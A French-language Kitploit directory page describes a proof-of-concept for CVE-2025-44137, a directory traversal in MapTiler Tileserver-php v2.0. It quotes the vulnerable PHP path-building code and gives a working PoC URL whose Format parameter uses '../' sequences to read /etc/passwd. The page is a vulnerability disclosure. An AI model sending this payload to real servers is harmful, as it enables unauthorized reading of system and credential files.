Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-44137 — Exploit de preuve de concept pour CVE-2025-44137: traversée de répertoire non authentifiée dans MapTiler Tileserver-php v2.0, permettant la lecture arbitraire de fichiers via des paramètres GET spécialement conçus. | Kitploit
Outils/GitHubGitHub/mheranco/cve-2025-44137
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubmheranco/cve-2025-44137

CVE-2025-44137

Exploit de preuve de concept pour CVE-2025-44137: traversée de répertoire non authentifiée dans MapTiler Tileserver-php v2.0, permettant la lecture arbitraire de fichiers via des paramètres GET spécialement conçus.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-44137

Lecture de fichier non authentifiée dans MapTiler Tileserver-php v2.0.

Description

MapTiler Tileserver-php v2.0 est vulnérable à une traversée de répertoire. La fonction renderTile dans tileserver.php est chargée de délivrer les tuiles stockées sous forme de fichiers sur le serveur via une requête web. La construction du chemin d'accès à un fichier permet l'utilisation de '../', qui peut être utilisé pour lire n'importe quel fichier sur le serveur web. Les paramètres GET concernés sont "TileMatrix", "TileRow", "TileCol" et "Format".

https://github.com/maptiler/tileserver-php/blob/d0fdeaec69688dc500b652a23669d724d7d53df2/tileserver.php#L381-L398

root@kitploit:~
      $name = './' . $tileset . '/' . $z . '/' . $x . '/' . $y;
      $mime = 'image/';
      if($ext != null){
        $name .= '.' . $ext;
      }
      if ($fp = @fopen($name, 'rb')) {
        if($ext != null){
          $mime .= $ext;
        }else{
          //detect image type from file
          $mimetypes = ['gif', 'jpeg', 'png'];
          $mime .= $mimetypes[exif_imagetype($name) - 1];
        }
        header('Access-Control-Allow-Origin: *');
        header('Content-Type: ' . $mime);
        header('Content-Length: ' . filesize($name));
        fpassthru($fp);
        die;

PoC

http://localhost/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=.

Capture d'écran 1 Capture d'écran 2

Crédits

Martin Herancourt

Télécharger l’outil